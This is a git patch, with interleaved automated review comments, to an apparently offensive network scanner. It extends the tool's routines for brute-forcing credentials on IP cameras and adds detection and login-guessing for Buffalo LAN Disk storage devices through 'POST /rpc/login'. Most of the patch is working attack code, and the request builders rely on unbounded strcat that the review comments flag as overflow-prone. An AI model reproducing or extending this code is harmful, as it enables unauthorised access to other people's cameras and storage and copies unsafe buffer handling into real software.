From 6ad93f6ca26f11509a7b4ce9a90d6f8be9267efb Mon Sep 17 00:00:00 2001
From: cora32
Date: Sun, 2 Nov 2014 12:53:50 +0300
Subject: [PATCH] Added Buffalo Lan Disk detection
---
 connector.cpp | 83 +++++++++++++++++++++++++++++++++++++++++++++++---
 finder.cpp | 36 ++++++++++++++++++----
 nesca_3.cpp | 2 +-
 3 files changed, 108 insertions(+), 13 deletions(-)
diff --git a/connector.cpp b/connector.cpp
index 77fd149..05f4b60 100644
--- a/connector.cpp
+++ b/connector.cpp
@@ -381,6 +381,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
 strcat(hRqst, path);
 strcat(hRqst, " HTTP/1.1\r\nHost: ");
 strcat(hRqst, ip);
+ if(port != 80){
+ strcat(hRqst, ":");
+ char tbuff[16] = {0};
+ strcat(hRqst, itoa(port, tbuff, 10));
+ };
 if(cookieLen != 0)
 {
 strcat(hRqst, "\r\nCookie: ");
@@ -577,6 +582,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
 strcat(request, path);
 strcat(request, " HTTP/1.1\r\nHost: ");
 strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 if(cookieLen != 0)
 {
 strcat(request, "\r\nCookie: ");
@@ -614,6 +624,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
 strcat(request, path);
 strcat(request, " HTTP/1.1\r\nHost: ");
 strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 if(cookieLen != 0)
 {
 strcat(request, "\r\nCookie: ");
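Review bot: The five-line `if(port != 80){ ... }` block that appends the port to the Host header is pasted verbatim into every request builder instead of living in one helper; it first appears in the connector.cpp hunk at -381 and recurs in the hunks at -577 and -614, in each _IPCameraBrute branch, and in redirectReconnect in finder.cpp. Each copy also grows `hRqst`/`request` by up to six bytes through unbounded `strcat`, and the sizes of those buffers are declared outside the hunks, so the remaining capacity should be checked before appending. A single bounded helper, e.g. `static void appendHostPort(char *dst, size_t cap, int port)` writing with `snprintf(dst + strlen(dst), cap - strlen(dst), ":%d", port);`, would remove the duplication and the non-standard `itoa`. _BABrute's body starts and ends outside these hunks.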
@@ -1934,8 +1949,7 @@ lopaStr _WFBrut(char *cookie, char *ip, int port, char *methodVal, char *actionV strcat(request, "\r\nCookie: "); strcat(request, cookie); }; - strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n"); - strcat(request, "Content-length: "); + strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\nContent-Length: "); strcat(request, itoa(strlen(argData), b, 10)); strcat(request, "\r\n\r\n"); @@ -2324,6 +2338,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) { negVector.push_back("Password Error"); } + else if(strcmp(SPEC, "BUFFALO") == 0) + { + negVector.push_back("403 Forbidden"); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); 
@@ -2358,7 +2376,12 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
 strcat(request, "&pwd=");
 strcat(request, pass);
 strcat(request, " HTTP/1.1\r\nHost: ");
- strcat(request, ip);
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
 }
 else if(strcmp(SPEC, "GEO") == 0)
@@ -2369,6 +2392,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
 strcat(request, pass);
 strcat(request, " HTTP/1.1\r\nHost: ");
 strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
 }
 else if(strcmp(SPEC, "EasyCam") == 0)
@@ -2383,6 +2411,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
 strcat(request, pass);
 strcat(request, " HTTP/1.1\r\nHost: ");
 strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
 }
 else if(strcmp(SPEC, "Foscam") == 0)
@@ -2397,6 +2430,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
 strcat(request, pass);
 strcat(request, " HTTP/1.1\r\nHost: ");
 strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
 }
 else if(strcmp(SPEC, "AVIOSYS") == 0)
@@ -2407,7 +2445,38 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
 strcat(request, pass);
 strcat(request, " HTTP/1.1\r\nHost: ");
 strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
 strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
+ int loginLength = strlen(login);
+ int passLength = strlen(pass);
+ int sz = loginLength + passLength + strlen("user=&password=");
+ char *passString = new char[sz + 1];
+ ZeroMemory(passString, sizeof(passString));
+ strcpy(passString, "user=");
+ strcat(passString, login);
+ strcat(passString, "&password=");
+ strcat(passString, pass);
+ strcat(request, "\r\nContent-Length: ");
+ char tempBuff[16] = {0};
+ strcat(request, itoa(sz, tempBuff, 10));
+ strcat(request, "\r\n\r\n");
+ strcat(request, passString);
+ delete []passString;
 };
 int res = _webLoginSeq(request, login, pass, ip, port, passCounter,
SPEC, negVector); @@ -2534,10 +2603,12 @@ int Connector::_ConnectToPort(char *ip, const char *portC, char *hl) int strFlag = 0; strcpy(mes, buff1); strcat(mes, ip); - strcat(mes, ":"); - strcat(mes, portC); - strcat(mes, buff2); int port = atoi(portC); + if(port != 80){ + strcat(mes, ":"); + strcat(mes, portC); + }; + strcat(mes, buff2); int cRes; if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR); diff --git a/finder.cpp b/finder.cpp index 1e722af..a2b358d 100644 --- a/finder.cpp +++ b/finder.cpp @@ -181,7 +181,7 @@ int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port) { if(gNegDebugMode) { - stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\""); + stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\""); if(strlen(negWord) < 2) { stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord))); @@ -290,6 +290,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip) && strstr(buffcpy, "g_ologin.dologin()") != NULL ) return 44; //hikvision cam 2 if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG??? + if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL || strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL 
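Review bot: `ZeroMemory(passString, sizeof(passString));` in the new BUFFALO branch of _IPCameraBrute clears only the size of a pointer (4 or 8 bytes), not the `sz + 1` bytes just allocated, because `passString` is a `char *`; it should read `ZeroMemory(passString, sz + 1);`. The `strcpy` that follows terminates the string, so the request is unaffected today, but the call misstates what is initialised and will bite if the code is later changed to rely on the zero fill. The branch then appends `passString`, whose length depends on `login` and `pass`, to `request` with plain `strcat`; `request` is declared outside the hunk, so a length check against its capacity before the final append is needed to rule out an overflow. The function's body starts and ends outside this hunk.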
@@ -358,6 +359,8 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip) && strstr(buffcpy, "g_ologin.dologin()") != NULL ) return 44; //hikvision cam 2 if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG??? + if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk + if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL) || (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam @@ -1708,7 +1711,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char * } else if(flag == 38) //Foscam { - _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Basic Authorization", cp, recd, "Foscam"); + _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Web Authorization", cp, recd, "Foscam"); } else if(flag == 39) //EagleEye { @@ -1720,7 +1723,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char * } else if(flag == 41) //AVIOSYS-camera { - _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Basic Authorization", cp, recd, "AVIOSYS"); + _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Web Authorization", cp, recd, "AVIOSYS"); } else if(flag == 42) //NW_camera { 
@@ -1738,6 +1741,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
 {
 _specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, "");
 }
+ else if(flag == 46) //Buffalo disk
+ {
+ _specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
+ }
 else if(flag == 20) //AXIS Camera
 {
 _specBrute(ps.cookie, ip, p, hl, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "AXIS Camera", "Basic Authorization", cp, recd, "");
@@ -1901,6 +1908,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
 strcat(mes, tempPath);
 strcat(mes, rbuff2);
 strcat(mes, tempIP);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
 if(strlen(cookie) != 0)
 {
 strcat(mes, rbuff3);
@@ -2028,9 +2040,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
 strcat(mes, tempPath);
 strcat(mes, rbuff2);
 strcat(mes, tempIP);
- strcat(mes, ":");
- char tbuff[16] = {0};
- strcat(mes, itoa(tempPort, tbuff, 10));
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
 if(strlen(cookie) != 0)
 {
 strcat(mes, rbuff3);
@@ -2129,6 +2143,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
 strcat(mes, tempPath);
 strcat(mes, rbuff2);
 strcat(mes, ip);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
 if(strlen(cookie) != 0)
 {
 strcat(mes, rbuff3);
@@ -2217,6 +2236,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
 strcat(mes, tempPath);
 strcat(mes, rbuff2);
 strcat(mes, ip);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
 if(strlen(cookie) != 0)
 {
 strcat(mes, rbuff3);
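Review bot: In the last two redirectReconnect hunks (at -2129 and -2217) the Host value is built from `ip` but the appended port is `tempPort`, whereas the two earlier hunks pair `tempIP` with `tempPort`. If `tempPort` is taken from the redirect target it may not belong to `ip`, so these branches should either append `port` or carry a comment such as `// tempPort equals port on this path because ...` stating why the pairing is intended. How `tempPort` is assigned is outside these hunks, so this is inferred from the visible lines only.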
diff --git a/nesca_3.cpp b/nesca_3.cpp
index 22628bb..c531d61 100644
--- a/nesca_3.cpp
+++ b/nesca_3.cpp
@@ -2194,7 +2194,7 @@ void nesca_3::slotOutData(QString ip, QString str)
 str.replace("Accept-Encoding:", "Accept-Encoding:");
 str.replace("User-Agent:", "User-Agent:");
 str.replace("Connection:", "Connection:");
- str.replace("Content-length:", "Content-length:");
+ str.replace("Content-Length:", "Content-Length:");
 str.replace("Authorization:", "Authorization:");
 _rOutProt.indexIn(str);
 prot = _rOutProt.cap(0);